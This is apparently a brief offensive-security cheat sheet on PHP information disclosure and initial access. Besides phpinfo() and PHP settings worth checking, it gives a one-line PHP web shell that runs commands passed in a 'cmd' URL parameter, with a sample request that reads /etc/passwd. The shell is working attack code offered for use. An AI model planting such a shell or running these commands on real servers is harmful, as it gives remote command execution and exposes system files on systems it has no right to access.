PHP Info Disclosure

Initial Access Web Attacks linux

phpinfo() snippet

<?php
phpinfo();
?>

Settings worth checking after `phpinfo()`

disable_functions
allow_url_fopen
allow_url_include

Inline command execution snippet

<?php
echo exec("id;whoami;date");
?>

Parameterized RCE snippet

<?php
echo exec($_GET['cmd']);
?>

Trigger with ....../test.php?cmd=cat /etc/passwd.